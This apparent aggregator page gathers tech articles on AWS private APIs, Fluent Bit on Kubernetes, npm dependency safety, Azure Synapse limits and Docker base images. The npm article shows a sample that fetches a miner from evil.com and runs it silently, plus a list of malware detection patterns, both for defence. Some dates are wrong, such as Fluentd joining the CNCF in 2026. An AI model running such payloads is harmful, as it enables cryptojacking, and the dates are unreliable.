production-ready verifier would also: Validate that the Presentation Definition was fully satisfied, ensuring all required claims or credential types were present and correctly formatted. Once all validations pass, the Verifier issues a response back to the wallet — for example, redirecting to a URI for further interaction, marking the user as verified, or simply displaying the successful outcome of the verification process. Takeaways The complete source code for both the backend microservices and the Android wallet application is available on GitHub: Backend (Spring Boot microservices): spring-boot-vci-vpAndroid wallet (Kotlin): android-vci-vp The README files of both repositories contain instructions and additional information, including how to run the demo, how to examine SD-JWT and vp_token using sites like https://www.sdjwt.co, Presentation Definition sample, and more. Video Finally, you can watch a screen recording that walks through the entire flow on YouTube.

By Kyriakos Mandalas

CORE

Unlocking the Benefits of a Private API in AWS API Gateway

AWS API Gateway is a managed service to create, publish, and manage APIs. It serves as a bridge between your applications and backend services. When creating APIs for our backend services, we tend to open it up using public IPs. Yes, we do authenticate and authorize access. However, oftentimes it is seen that a particular API is meant for internal applications only. In such cases it would be great to declare these as private. Public APIs expose your services to a broader audience over the internet and thus come with risks related to data exposure and unauthorized access. On the other hand, private APIs are meant for internal consumption only. This provides an additional layer of security and eliminates the risk of potential data theft and unauthorized access. AWS API Gateway supports private APIs. If an API is only by internal applications only it should be declared as private in API Gateway. This ensures that your data remains protected while still allowing teams to leverage the API for developing applications. The Architecture So, how does a private API really work? The first step is to mark the API as private when creating one in the API gateway. Once done, it will not have any public IP attached to it, which means that it will not be accessible over the Internet. Next, proceed with the API Gateway configuration. Define your resources and methods according to your application’s requirements. For each method, consider implementing appropriate authorization mechanisms such as IAM roles or resource policies to enforce strict access controls. Setting up the private access involves creating an interface VPC endpoint. The consumer applications would typically be running in a private subnet of a VPC. These applications would be able to access the api through the VPC endpoint. As an example, let us suppose that we are building an application using ECS as the compute service. The ECS cluster would run within a private subnet of a VPC. The application would need to access some common services of the application. These services are a set of microservices developed on Lambda and exposed through API Gateway. This is a perfect scenario and a pretty common one where it makes sense to declare these APIs as private. Key Benefits A private API can significantly increase the performance and security of an application. In this age of cybercrime, protecting data should be of utmost importance. Unscrupulous actors on the internet are always on the lookout for vulnerabilities, and any leak in the system poses a potential threat of data theft. Data security use cases are becoming incredibly important. This is where a private API is so advantageous. All interactions between services are within a private network, and since the services are not publicly exposed, there is no chance of data theft over the internet. Private APIs allow a secure method of data exchange, and the less exposed your data is, the better. Private APIs allow you to manage the overall data security aspects of your enterprise solution by letting you control access to sensitive data and ensuring it’s only exposed in the secure environments you’ve approved. The requests and responses don’t need to travel over the internet. Interactions are within a closed network. Resources in a VPC can interact with the API over private AWS network. This goes a long way in reducing latencies and optimizing network traffic. As a result private API can ensure better performance and for applications with quick processing needs can be a go to option. Moreover, private APIs make it easy to implement strong access control. You can determine, with near capability, who can access what from where, and what certain conditions need to be in place to do so, while providing custom access level groups as your organization sees fit. With the thoroughness of access control being signed off, not only is security improved, but you can also increase the flow to get things done. Finally, there is the element of cost that many do not consider when using private APIs in the AWS API Gateway as a benefit. Utilizing private APIs can significantly reduce the costs that flow when dealing with public traffic costs or resources that rely on perfect utilization in the transformed environment with the VPC. While you could think of this as a potential variable, and save you significant amounts of cost over time, if achieved. In addition to the benefits above, private APIs give your business the opportunity to develop an enterprise solution that meets your development needs. Building internal applications for your own use can help further customize your workflows or tailor customer experience, by allowing unique steps and experiences to be developed for customer journeys. Private APIs allow your organization to be dynamic and replicate tools or services quickly, while maintaining control of your technology platform. This allows your business to apply ideas and processes for future growth while remaining competitive in an evolving marketplace. Deploying private APIs within the AWS API Gateway is not solely a technical move — it is a means of investing in the reliability, future-proofing, and capability of your system architecture. The Importance of Making APIs Private In the modern digital world, securing your APIs has never been more important. If you don’t require public access to your APIs by clients, the best option is to make them private. By doing so, you can reduce the opportunity for threats and vulnerabilities to exist where they may compromise your data and systems. Public APIs become targets for anyone with malicious intent who wants to find and exploit openings. By keeping your APIs private and limiting access, you protect sensitive information and improve performance by removing unnecessary traffic. Additionally, utilizing best practices for secure APIs — using authentication protocols, testing for rate limiting, and encrypting your sensitive information — adds stronger front-line defenses. Making your APIs private is not just a defensive action, but a proactive strategy to secure the organization and their assets. In a world where breaches can result in catastrophic consequences, a responsible developer or organization should take every preemptive measure necessary to protect their digital environment. Best Practices The implementation of private APIs requires following best practices to achieve strong security, together with regulated access and efficient versioning. Safety needs to be your number one priority at all times. Your data protection against unauthorized access becomes possible through the implementation of OAuth or API keys authentication methods. Implementing a private API doesn’t mean that unauthorized access will not happen, and adequate protection should be in place. API integrity depends heavily on proper access control mechanisms. Role-based access control (RBAC) should be used to ensure users receive permissions that exactly match their needs. The implementation of this system protects sensitive endpoints from exposure while providing authorized users with smooth API interaction. The sustainable operation of your private API depends on proper management of its versioning system to satisfy users. A versioning system based on URL paths or request headers enables you to introduce new features and updates without disrupting existing integrations. The approach delivers a better user experience while establishing trust in API reliability. Conclusion In conclusion, private APIs aren't a passing fad; they are a deliberate initiative to help you maximize your applications with regard to supercharged security and efficiency. When you embrace private APIs, you are creating a method to protect sensitive data within a security-first framework, while enabling its use on other internal systems. In the environment of constant data breaches, that safeguard is paramount. The value of private APIs will undoubtedly improve not only the security posture of your applications but also the performance of your applications overall.

By Satrajit Basu

CORE

Mastering Fluent Bit: Installing and Configuring Fluent Bit on Kubernetes (Part 3)

This series is a general-purpose getting-started guide for those of us who want to learn about the Cloud Native Computing Foundation (CNCF) project Fluent Bit. Each article in this series addresses a single topic by providing insights into what the topic is, why we are interested in exploring that topic, where to get started with the topic, and how to get hands-on with learning about the topic as it relates to the Fluent Bit project. The idea is that each article can stand on its own, but that they also lead down a path that slowly increases our abilities to implement solutions with Fluent Bit telemetry pipelines. Let's take a look at the topic of this article, installing and configuring Fluent Bit on a Kubernetes cluster. In case you missed the previous article, I'm providing a short introduction to Fluent Bit before sharing how to install and use the Fluent Bit telemetry pipeline on our own local machine with container images. What Is Fluent Bit? Before diving into Fluent Bit, let's step back and look at the position of this project within the Fluent organization. If we look at the Fluent organization on GitHub, we find the Fluentd and Fluent Bit projects hosted there. The back story is that the project started with log parsing project Fluentd joining the CNCF in 2026 and reaching Graduated status in 2019. Once it became apparent that the world was heading into cloud native Kubernetes environments, the solution was not designed for the flexible and lightweight requirements that Kubernetes solutions demanded. Fluent Bit was born from the need to have a low-resource, high-throughput, and highly scalable log management solution for cloud native Kubernetes environments. The project was started within the Fluent organization as a sub-project in 2017, and the rest is now 10 years of history with the release of v4 last week! Fluent Bit has become so much more than a flexible and lightweight log pipeline solution, now able to process metrics and traces, and becoming a telemetry pipeline collection tool of choice for those looking to put control over their telemetry data right at the source where it's being collected. Let's get started with Fluent Bit and see what we can do for ourselves! Why Install on Kubernetes? When you dive into the cloud native world this means you are deploying containers on Kubernetes. The complexities increase dramatically as your applications and microservices interact in this complex and dynamic infrastructure landscape. Deployments can auto-scale, pods spin up and are taken down as the need arises, and underlying all of this are the various Kubernetes controlling components. All of these things are generating telemetry data and Fluent Bit is a wonderfully simple way to manage them across a Kubernetes cluster. It provides a way of collecting everything as you go while providing the pipeline parsing, filtering, and routing to handle all your telemetry data. For developers, this article will demonstrate installing and configuring Fluent Bit as a single point of log collection on a development Kubernetes cluster with a deployed workload. Where to Get Started Before getting started there will be some minimum requirements needed to run all the software and explore this demo project. The first is the ability to run container images with Podman tooling. While it is always best to be running the latest versions of most software, let's look at the minimum you need to work with the examples shown in this article. It is assumed you can install this on your local machine prior to reading this article. To test this, you can run the following from a terminal console on your machine: Shell $ podman -v podman version 5.4.1 If you prefer, you can install the Podman Desktop project, and it will provide all the needed CLI tooling you see used in the rest of this article. Be aware, I won't spend any time focusing on the desktop version. Also note that if you want to use Docker, feel free, it's pretty similar in commands and usage that you see here, but again, I will not reference that tooling in this article. Next, you will be using Kind to run a Kubernetes cluster on your local machine, so ensure the version is at least as shown: Shell $ kind version kind v0.27.0 ... To control the cluster and deployments, you need the tooling kubectl, with a minimum version as shown: Shell $ kubectl version Client Version: v1.32.2 Last but not least, Helm charts are leveraged to control your Fluent Bit deployment on the cluster, so ensure it is at least the following: Shell $ helm version version.BuildInfo{Version:"v3.16.4" ... Finally, all examples in this article have been done on OSX and are assuming the reader is able to convert the actions shown here to their own local machines. How to Install and Configure on Kubernetes The first installation of Fluent Bit on a Kubernetes cluster is done in several steps, but the foundation is ensuring your Podman virtual machine is running. The following assumes you have already initialized your Podman machine, so you can start it as follows: Shell $ podman machine start Starting machine "podman-machine-default" WARN[0000] podman helper is installed, but was not able to claim the global docker sock [SNIPPED OUTPUT] Another process was listening on the default Docker API socket address. You can still connect Docker API clients by setting DOCKER_HOST using the following command in your terminal session: export DOCKER_HOST='unix:///var/folders/6t/podman/podman-machine-default-api.sock' Machine "podman-machine-default" started successfully If you see something like this, then there are issues with connecting to the API socket, so Podman provides a variable to export that will work for this console session. You just need to copy that export line into your console and execute it as follows: Shell $ export DOCKER_HOST='unix:///var/folders/6t/podman/podman-machine-default-api.sock' Now that you have Podman ready, you can start the process that takes a few steps in order to install the following: Install a Kubernetes two-node cluster with Kind.Install Ghost CMS to generate workload logs.Install and configure Fluent Bit to collect Kubernetes logs. To get started, create a directory structure for your Kubernetes cluster. You need one for the control node and one for the worker node, so run the following to create your setup: Shell $ mkdir -p target $ mkdir -p target/ctrlnode $ mkdir -p target/wrkrnode1 The next step is to run the Kind install command with a few configuration flags explained below. The first command is to remove any existing cluster you might have of the same name, clearing the way for our installation: Shell $ KIND_EXPERIMENTAL_PROVIDER=podman kind --name=2node delete cluster using podman due to KIND_EXPERIMENTAL_PROVIDER enabling experimental podman provider Deleting cluster "2node" ... You need a Kind configuration to define our Kubernetes cluster and point it to the directories you created, so create the file 2nodekindconfig.yaml with the following : Shell kind: Cluster apiVersion: kind.x-k8s.io/v1alpha4 name: 2nodecluster nodes: - role: control-plane extraMounts: - hostPath: target/ctrlnode containerPath: /ghostdir - role: worker extraMounts: - hostPath: target/wrkrnode1 containerPath: /ghostlier With this file, you can create a new cluster with the following definitions and configuration to spin up a two-node Kubernetes cluster called 2node: Shell $ KIND_EXPERIMENTAL_PROVIDER=podman kind create cluster --name=2node --config="2nodekindconfig.yaml" --retain using podman due to KIND_EXPERIMENTAL_PROVIDER enabling experimental podman provider Creating cluster "2node" ... ✓ Ensuring node image (kindest/node:v1.32.2) ✓ Preparing nodes ✓ Writing configuration ✓ Starting control-plane ✓ Installing CNI ✓ Installing StorageClass ✓ Joining worker nodes Set kubectl context to "kind-2node" You can now use your cluster with: kubectl cluster-info --context kind-2node Have a nice day! The Kubernetes cluster spins up, and you can view it with kubectl tooling as follows: Shell $ kubectl config view apiVersion: v1 clusters: - cluster: certificate-authority-data: DATA+OMITTED server: https://127.0.0.1:58599 name: kind-2node contexts: - context: cluster: kind-2node user: kind-2node name: kind-2node current-context: kind-2node kind: Config preferences: {} users: - name: kind-2node user: client-certificate-data: DATA+OMITTED client-key-data: DATA+OMITTED To make use of this cluster, you can set the context for your kubectl tooling as follows: Shell $ kubectl config use-context kind-2node Switched to context "kind-2node". Time to deploy a workload on this cluster to start generating real telemetry data for Fluent Bit. To prepare for this installation, we need to create the persistent volume storage for our workload, a Ghost CMS. The following needs to be put into the file ghost-static-pvs.yaml: Shell --- apiVersion: v1 kind: PersistentVolume metadata: name: ghost-content-volume labels: type: local spec: storageClassName: "" claimRef: name: data-my-ghost-mysql-0 namespace: ghost capacity: storage: 8Gi accessModes: - ReadWriteMany hostPath: path: "/ghostdir" --- apiVersion: v1 kind: PersistentVolume metadata: name: ghost-database-volume labels: type: local spec: storageClassName: "" claimRef: name: my-ghost namespace: ghost capacity: storage: 8Gi accessModes: - ReadWriteMany hostPath: path: "/ghostdir" With this file, you can now use kubectl to create it on your cluster as follows: Shell $ kubectl create -f ghost-static-pvs.yaml --validate=false persistentvolume/ghost-content-volume created persistentvolume/ghost-database-volume created With the foundations laid for using Ghost CMS as our workload, we need to add the Helm chart to our local repository before using it to install anything: Shell $ helm repo add bitnami https://charts.bitnami.com/bitnami "bitnami" has been added to your repositories The next step is to use this repository to install Ghost CMS, configuring it by supplying parameters as follows: Shell $ helm upgrade --install ghost-dep bitnami/ghost --version "21.1.15" --namespace=ghost --create-namespace --set ghostUsername="adminuser" --set ghostEmail="admin@example.com" --set service.type=ClusterIP --set service.ports.http=2368 Release "ghost-dep" does not exist. Installing it now. NAME: ghost-dep LAST DEPLOYED: Thu May 1 16:28:26 2025 NAMESPACE: ghost STATUS: deployed REVISION: 1 TEST SUITE: None NOTES: CHART NAME: ghost CHART VERSION: 21.1.15 APP VERSION: 5.86.2 ** Please be patient while the chart is being deployed ** 1. Get the Ghost URL by running: echo Blog URL : http://127.0.0.1:2368/ echo Admin URL : http://127.0.0.1:2368/ghost kubectl port-forward --namespace ghost svc/ghost-dep 2368:2368 2. Get your Ghost login credentials by running: echo Email: admin@example.com echo Password: $(kubectl get secret --namespace ghost ghost-dep -o jsonpath="{.data.ghost-password}" | base64 -d) This command completes pretty quickly, but in the background, your cluster is spinning up the Ghost CMS nodes, and this takes some time. To ensure your installation is ready to proceed, run the following command that waits for the workload to finish spinning up before proceeding: Shell $ kubectl wait --for=condition=Ready pod --all --timeout=200s --namespace ghost pod/ghost-dep-74f8f646b-96d59 condition met pod/ghost-dep-mysql-0 condition met If this command times out due to your local machine taking too long, just restart it until it finishes with the two condition met statements. This means your Ghost CMS is up and running, but needs a bit of configuration to reach it on your cluster from the local machine. Run the following commands, noting the first one is put into the background with the ampersand sign: Shell $ kubectl port-forward --namespace ghost svc/ghost-dep 2368:2368 & Forwarding from 127.0.0.1:2368 -> 2368 Forwarding from [::1]:2368 -> 2368 [1] 6997 This completes the installation and configuration of our workload, which you can validate is up and running at http://localhost:2368. This should show you a Users Blog landing page on your Ghost CMS instance; nothing more is needed for this article than to have it running. The final step is to install Fluent Bit and start collecting cluster logs. Start by adding the Fluent Bit Helm chart to your local repository as follows: Shell $ helm repo add fluent https://fluent.github.io/helm-charts "fluent" has been added to your repositories The installation will need some configuration parameters that you need to put into a file passed to the helm chart during installation. Add the following to the file fluentbit-helm.yaml: Shell args: - --workdir=/fluent-bit/etc - --config=/fluent-bit/etc/conf/fluent-bit.yaml config: extraFiles: fluent-bit.yaml: | service: flush: 1 log_level: info http_server: true http_listen: 0.0.0.0 http_port: 2020 pipeline: inputs: - name: tail tag: kube.* read_from_head: true path: /var/log/containers/*.log multiline.parser: docker, cri filters: - name: grep match: '*' outputs: - name: stdout match: '*' With this file, you can now install Fluent Bit on your cluster as follows: Shell $ helm upgrade --install fluent-bit fluent/fluent-bit --set image.tag="4.0.0" --namespace=logging --create-namespace --values="support/fluentbit-helm.yaml" Release "fluent-bit" does not exist. Installing it now. NAME: fluent-bit LAST DEPLOYED: Thu May 1 16:50:04 2025 NAMESPACE: logging STATUS: deployed REVISION: 1 NOTES: Get Fluent Bit build information by running these commands: export POD_NAME=$(kubectl get pods --namespace logging -l "app.kubernetes.io/name=fluent-bit,app.kubernetes.io/instance=fluent-bit" -o jsonpath="{.items[0].metadata.name}") kubectl --namespace logging port-forward $POD_NAME 2020:2020 curl http://127.0.0.1:2020 This starts the installation of Fluent Bit, and again, you will need to wait until it completes with the help of the following commands: Shell $ kubectl wait --for=condition=Ready pod --all --timeout=100s --namespace logging pod/fluent-bit-58vs8 condition met Now you can verify that your Fluent Bit instance is running and collecting all Kubernetes cluster logs, from the control node, the worker node, and from the workloads on the cluster, with the following: Shell $ kubectl config set-context --current --namespace logging Context "kind-2node" modified. $ kubectl get pods NAME READY STATUS RESTARTS AGE fluent-bit-58vs8 1/1 Running 0 6m56s $ kubectl logs fluent-bit-58vs8 [DUMPS-ALL-CLUSTER-LOGS-TO-CONSOLE] Now you have a fully running Kubernetes cluster, with two nodes, a workload in the form of a Ghost CMS, and finally, you've installed Fluent Bit as your telemetry pipeline, configured to collect all cluster logs. If you want to do this without each step done manually, I've provided a Logs Control Easy Install project repository that you can download, unzip, and run with one command to automate the above setup on your local machine. More in the Series In this article, you learned how to install and configure Fluent Bit on a Kubernetes cluster to collect telemetry from the cluster. This article is based on this online free workshop. There will be more in this series as you continue to learn how to configure, run, manage, and master the use of Fluent Bit in the wild. Next up, controlling your logs with Fluent Bit on a Kubernetes cluster.

By Eric D. Schabell

CORE

While Performing Dependency Selection, I Avoid the Loss Of Sleep From Node.js Libraries' Dangers

Running "npm install" requires trusting unknown parties online. Staring at node_modules for too long leads someone to become a node_modules expert. We Should Have Solved This Issue By 2025 The registry expands relentlessly at the rate of one new library addition every six seconds while maintaining a current package total of 2.9 million. Most packages function as helpful code, while others contain fatal bugs that professionals must avoid altogether because the total number of registrations swells to mass proportions. The back-end services I manage process more than a billion monthly requests, while one rogue script from postinstall can damage uptime service agreements and customer trust. A comprehensive guide follows, which includes pre‑dependency protocols I use alongside detailed practical commands and actual registry vulnerabilities that can be accessed in Notion specifically. 1. More Real‑Life Horror Stories (FOMO ≈ Fear Of Malware) coa@2.0.3 and rc@1.2.9 Hijack (Nov 2021) A compromised maintainer account shipped a cryptominer baked into these CLI staples. Jenkins pipelines worldwide suddenly used 100 % CPU. JavaScript // Hidden inside compiled JS import https from 'node:https'; import { tmpdir } from 'node:os'; import { writeFileSync, chmodSync } from 'node:fs'; import { join } from 'node:path'; import { spawn } from 'node:child_process'; const url = 'https://evil.com/miner.sh'; const out = join(tmpdir(), '._miner.sh'); // quietly download the payload https.get(url, res => { const chunks = []; res.on('data', c => chunks.push(c)); res.on('end', () => { writeFileSync(out, Buffer.concat(chunks)); chmodSync(out, 0o755); // make it executable spawn(out, { stdio: 'ignore', detached: true }).unref(); // run in background }); }); ua-parser-js@0.7.29 supply‑chain Attack Same month, different package: the attacker slipped password‑stealing malware into a browser sniffing helper relied on by Facebook, Amazon, and everyone’s grandma. colors + faker protest‑ware (Jan 2022) The maintainer, tired of free work, released a stunt update: an infinite loop that printed “LIBERTY LIBERTY LIBERTY” in rainbow ASCII. Production builds froze, CEOs panicked, Twitter laughed. eslint-scope@5.1.1 Trojan (Oct 2023) Malicious code tried to steal npm tokens from every lint run. Because who audits their linter? Left‑Pad Again? In 2024, the name got squatted with a look‑alike package leftpad (no dash) containing spyware. Typos kill. 2. My Five‑Minute Smell Test, Remixed PASSFAILLast commit < 90 daysLast commit = "Initial commit" in 20195 maintainers or active org1 solo dev, mailbox 404Issues answered this month200 open issues, last reply in 2022MIT / Apache-2.0 / ISC"GPL‑3+ or ask my lawyer"No postinstall scriptpostinstall downloads EXEDependencies ≤ 10A helper with 200 indirect deps 3. Tool Belt (The Upgraded Edition) Shell # Baseline CVE scan npm audit --omit dev # Deep CVE + license vetting npx snyk test --all-projects # How heavy is the lib? npx packagephobia install slugify # Who maintains it? npx npm-quick-run maintainers slugify # Malware signatures (community DB) npx npq slugify CI tip: wire npm-audit-level=high, snyk test, and npq into pipelines. Fail on red, ping Slack. 4. Pin, Prune, Patch, Protect Pin Hard JavaScript // package.json "dependencies": { "kafka-node": "6.0.3" // exact, no ^ } Use Renovate/Dependabot for bump PRs; review changelog, merge deliberately. Prune Deeper Every quarter, I run: Shell npx depcheck # lists unused deps npm prune --production # kicks out dev junk Last cleanup saved 72 MB in our Docker image and shaved 10s off cold start. Patch Until Upstream Fixes Shell npx patch-package jsonwebtoken # edit node_modules/jsonwebtoken/lib/* git add patches/ Document the patch in the repo root: future‑you will forget. Protect Runtime Enable Node’s built‑in policy loader to block dynamic require() from outside allowed scopes: Shell node --experimental-policy=policy.json server.js 5. Two Copy‑Paste Investigations Why Is bcrypt Exploding My Alpine Image? Shell FROM node:20-alpine RUN npm i bcrypt That triggers make + native compilation, requiring Python 3 and build‑base. I swap to pure‑JS bcryptjs: JavaScript import bcrypt from 'bcryptjs'; const hash = bcrypt.hashSync('secret', 10); Docker size drops by 80 MB, build time by 40s. Parsing Front‑Matter Without 27 DepsNeed YAML front‑matter? Instead of gray-matter (+21 deps) I use @std/parse-yaml(built‑in to Deno, polyfilled for Node) — zero extra dependencies. Java import { parse } from '@std/parse-yaml'; const [meta, ...body] = src.split('---\n'); const data = parse(meta); Performance: 2× faster in my micro‑benchmark (~50 kB ms timing) and nothing to audit. 6. The 60‑Second Source Glance Open the main file on GitHub. Scan for: Shell eval( new Function( child_process.exec( fetch('http://') // inside Node package? sus (Buffer.from('ZXZpbA==','base64')) // encoded blob process.env['npm_config_'] // token grab 7. Runtime Guards (Defense in Depth) Lockfile signing: The npm‑package‑integrity flag (npm audit signatures) ensures your prod lockfile matches registry tarball hashes.Open‑policy‑agent (OPA) sidecar on CI: Block merges that add >20 new transitive deps or any GPL license.Seccomp profiles in Docker: Disallow clone, ptrace, and mount syscalls for Node containers. A rogue lib can’t escalate if the kernel won’t let it.Read‑only root FSon Kubernetes: Forces libraries to stick to /tmp, kills self‑patching malware. 8. Performance Profiling Before Production Shell node --require=clinic/doctor app.js # CPU flame graph Then swap heavy helpers (moment → dayjs, request → got). Saved 120 ms P99 on one GraphQL gateway. Example: JavaScript // Heavy import moment from 'moment'; console.log(moment().add(1, 'week').format()); // Light import { addWeeks, format } from 'date-fns'; console.log(format(addWeeks(new Date(), 1), 'yyyy-MM-dd')); Same output, 95 kB less JS. 9. ES Module Gotchas (2025 Edition) Many libs are now “type”: “module”. Common pitfalls: JavaScript // Fail: breaks in ESM-only lib const lib = require('esm-only'); // Success: dynamic import const lib = await import('esm-only'); // or modern Node import lib from 'esm-only'; If your build still needs CJS, wrap in createRequire: Embedded Javascript import { createRequire } from 'module'; const require = createRequire(import.meta.url); const lib = require('cjs-only'); 10. Keeping Humans in the Loop Dependencies aren’t set‑and‑forget. My team follows this ritual: The team holds a fifteen-minute stand-up meeting each week to review the pending renovate PRs before selecting one merge request and checking the staging output.As part of the monthly malware bingo ritual each developer selects a single random dependency to audit which leads to creating a three-line summary in Notion. The development team detects typosquatting issues before production release.The post-mortem template incorporates an essential question about dependency hygiene standards in relation to the investigated incident. Keeps the topic alive. Parting Thoughts (A Love‑Hate Ode) The Node ecosystem functions as an enormous second-hand hardware showroom that contains various devices with different connection issues as well as exemplary items but lacks any identifying tags. Check the functioning of quality materials while testing electrical components with protective gloves on hand. Please share your supply-chain experiences and product finds that replace problematic software systems by reaching me through Twitter or LinkedIn. We become safer as a result of war stories even as these stories give us more enjoyment than reading CVE feeds independently during the night. When shipping your application, enjoy success and let your npm ci logs show only positive outcomes.

By Hayk Ghukasyan

Microsoft Azure Synapse Analytics: Scaling Hurdles and Limitations

Azure Synapse Analytics is a strong tool for processing large amounts of data. It does have some scaling challenges that can slow things down as your data grows. There are also a few built-in restrictions that could limit what you’re able to do and affect both performance and overall functionality. So, while Synapse is powerful, it’s important to be aware of these potential roadblocks as you plan your projects. Data Distribution and Skew Data skew remains a significant performance bottleneck in Synapse Analytics. Poor distribution key selection can lead to: 80-90% of data concentrated on 10% of nodesHotspots during query executionExcessive data movement via TempDB You can check for data skew by checking how rows are distributed across the distribution_id (which typically maps 1:1 to compute nodes at maximum scale). SQL SELECT distribution_id, COUNT(*) AS row_count FROM [table_name] GROUP BY distribution_id ORDER BY row_count DESC; If you see that a few (distribution_id)s have a much higher (row_count) than others, this indicates skew. To mitigate this: Use high-cardinality columns for even distributionMonitor skew using DBCC PDW_SHOWSPACEUSEDRedistribute tables with CREATE TABLE AS SELECT (CTAS) Resource Management and Scaling 1. SQL Pools You do not have any control over the built-in pool configuration. For a dedicated pool, the defaults are: Maximum DWU: Gen1: DW6000, Gen2: DW30000cScaling requires manual intervention using SQL commands To manually scale your dedicated SQL pool, you use the following ALTER DATABASE command. Here’s how you do it: SQL ALTER DATABASE [your_database] MODIFY (SERVICE_OBJECTIVE = 'DW1000c'); When you scale a Synapse pool, it goes into “Scaling” mode for a little while, and once it’s done, it switches back to “Online” and is ready to use. Key Points Scaling is not automatic, so you must run the command yourself.The SQL pool must be online to scale.You can also scale using PowerShell or the Azure portal, but the SQL command is a direct way to do it. 2. Apache Spark Pools Scale-up triggers if resource utilization exceeds capacity for 1 minute.Scale-down requires 2 minutes of underutilization. 3. Integration Runtimes Manual scaling through the Azure portal and not from the Synapse workspace. 4. Concurrency Limits Maximum 128 concurrent queries; any further excess queries are queued.Concurrent open sessions: 1024 for DWU1000c and higher, 512 for DWU500c and lower. Query and Data Limitations 1. SQL Feature Gaps No support for triggers, cross-database queries, or geospatial data typesLimited use of expressions like GETDATE() or SUSER_SNAME()No FOR XML/FOR JSON clauses or cursor support 2. Data Size Restrictions Source table row size limited to 7,500 bytes for Azure Synapse Link for SQLLOB data > 1 MB not supported in initial snapshots for certain data types 3. Query Constraints Maximum 4,096 columns per row in SELECT resultsUp to 32 nested subqueries in a SELECT statementJOIN limited to 1,024 columns 4. View Limitations Maximum of 1023 columns in a view. If you have more columns, view restructuring is needed. SQL Error: CREATE TABLE failed because column 'VolumeLable' in table 'QTable' exceeds the maximum of 1024 columns. To get around this, you’ll just need to break your view up into a few smaller ones, each with fewer than 1,024 columns. For example: SQL -- First view with columns 1 to 1023 CREATE VIEW dbo.BigTable_Part1 AS SELECT col1, col2, ..., col1023 FROM dbo.BigTable; -- Second view with the remaining columns CREATE VIEW dbo.BigTable_Part2 AS SELECT col1024, col1025, ..., col1100 FROM dbo.BigTable; SQL -- Combine views SELECT * FROM dbo.BigTable_Part1 p1 JOIN dbo.BigTable_Part2 p2 ON p1.PrimaryKey = p2.PrimaryKey; Limited Data Format Support ORC and Avro formats are not supported which are common file formats in Enterprise data. Moving to parquet or deltalake format is recommended. Integrated with the very old version of Deltalake, which does not support critical features like column-mapping, column renaming, etc. Azure Synapse Spark Pool showing Delta Lake version Access Limitations When you try to set up Azure Synapse Link for SQL, you might run into an error if the database owner isn’t linked to a valid login. Basically, the system needs the database owner to be tied to a real user account to work properly. If it’s not, Synapse Link can’t connect and throws an error. Workaround To fix this, just make sure the database owner is set to a real user that actually has a login. You can do this with a quick command: SQL sqlALTER AUTHORIZATION ON DATABASE::[YourDatabaseName] TO [ValidLogin]; Replace (YourDatabaseName) with your actual database name and (ValidLogin) with the name of a valid server-level login or user. This command changes the ownership of the database to the specified login, ensuring that the database owner is properly mapped and authenticated. Performance Optimization Challenges 1. Indexing Issues Clustered Columnstore Index (CCI) degradation due to frequent updates or low memoryOutdated statistics leading to suboptimal query plans 2. TempDB Pressure Data movement from skew or incompatible joins can quickly fill TempDBMaximum TempDB size: 399 GB per DW100c 3. IDENTITY Column Behavior Distributed across 60 shards, leading to non-sequential values Backup and Recovery Limitations No offline .BAK or .BACPAC backups with dataLimited to 7-day retention or creating database copies (incurring costs) Conclusion Azure Synapse Analytics is a powerful tool for handling big data, but it’s not without its quirks. You’ll run into some scaling headaches and built-in limits that can slow things down or make certain tasks tricky. To get the best performance, you’ve got to be smart about how you distribute your data, manage resources, and optimize your queries. Keeping an eye on things and tuning regularly helps avoid bottlenecks and keeps everything running smoothly. Basically, it’s great — but you’ll need to work around some bumps along the way to make it really shine.

By Vamshidhar Morusu

Docker Base Images Demystified: A Practical Guide

What Is a Docker Base Image? A Docker base image is the foundational layer from which containers are built. Think of it as the “starting point” for your application’s environment. It’s a minimal, preconfigured template containing an operating system, runtime tools, libraries, and dependencies. When you write a Dockerfile, the FROM command defines this base image, setting the stage for all subsequent layers. For example, you might start with a lightweight Linux distribution like Alpine, a language-specific image like Python or Node.js, or even an empty "scratch" image for ultimate customization. These base images abstract away the underlying infrastructure, ensuring consistency across development, testing, and production environments. Choosing the right base image is critical, as it directly impacts your container’s security, size, performance, and maintainability. Whether optimizing for speed or ensuring compatibility, your base image shapes everything that follows. Why Are These Foundations So Important? Building on the definition, consider base images the essential blueprints for your container’s environment. They dictate the core operating system and foundational software your application relies on. Building a container without a base image means manually assembling the entire environment. This process is complex, error-prone, and time-consuming. Base images provide that crucial standardized and reproducible foundation, guaranteeing consistency no matter where your container runs. Furthermore, the choice of base image significantly influences key characteristics of your final container: Size: Smaller base images lead to smaller final images, resulting in faster downloads, reduced storage costs, and quicker deployment times.Security: Minimalist bases inherently contain fewer components (libraries, utilities, shells). Fewer components mean fewer potential vulnerabilities and a smaller attack surface for potential exploits.Performance: The base image can affect startup times and resource consumption (CPU, RAM). Making a deliberate choice here has significant downstream consequences. Common Types of Base Images: A Quick Tour As mentioned, base images come in various flavors, each suited for different needs. Let’s delve a bit deeper into the common categories you’ll encounter: Scratch: The absolute bare minimum. This special, empty image contains no files, providing a completely clean slate. It requires you to explicitly add every single binary, library, configuration file, and dependency your application needs to run. It offers ultimate control and minimal size.Alpine Linux: Extremely popular for its incredibly small footprint (often just ~5MB). Based on musl libc and BusyBox, it's highly resource-efficient. Ideal for reducing image bloat, though musl compatibility can sometimes require extra steps compared to glibc-based images.Full OS distributions (e.g., Ubuntu, Debian, CentOS): These offer a more complete and familiar Linux environment. They include standard package managers (apt, yum) and a wider array of pre-installed tools. While larger, they provide broader compatibility and can simplify dependency installation, often favored for migrating applications or when ease-of-use is key.Distroless images (Google): Security-focused images containing only the application and its essential runtime dependencies. They deliberately exclude package managers, shells, and other standard OS utilities, significantly shrinking the attack surface. Excellent for production deployments of applications written in languages like Java, Python, Node.js, .NET, and others for which distroless variants exist.Language-specific images (e.g., Python, Node.js, OpenJDK): Maintained by official sources, these images conveniently bundle specific language runtimes, compilers, and tools, streamlining development workflows. Choosing the Right Base Image: Key Considerations Selecting the optimal base image requires balancing several factors, directly tying back to the impacts discussed earlier: Size: How critical is minimizing image size for storage, transfer speed, and deployment time? (Alpine, scratch, Distroless are typically the smallest).Security: What is the required security posture? Fewer components generally mean fewer vulnerabilities. (Consider scratch, Distroless, Wolfi, or well-maintained official images).Compatibility and dependencies: Does your application need specific OS libraries (like glibc) or tools unavailable in minimal images? Do you require common debugging utilities within the container?Ease of use and familiarity: How comfortable is your team with the image’s environment and package manager? Familiarity can speed up development.Maintenance and support: Who maintains the image, and how frequently is it updated with security patches? Official images are generally well-supported. Deep Dive 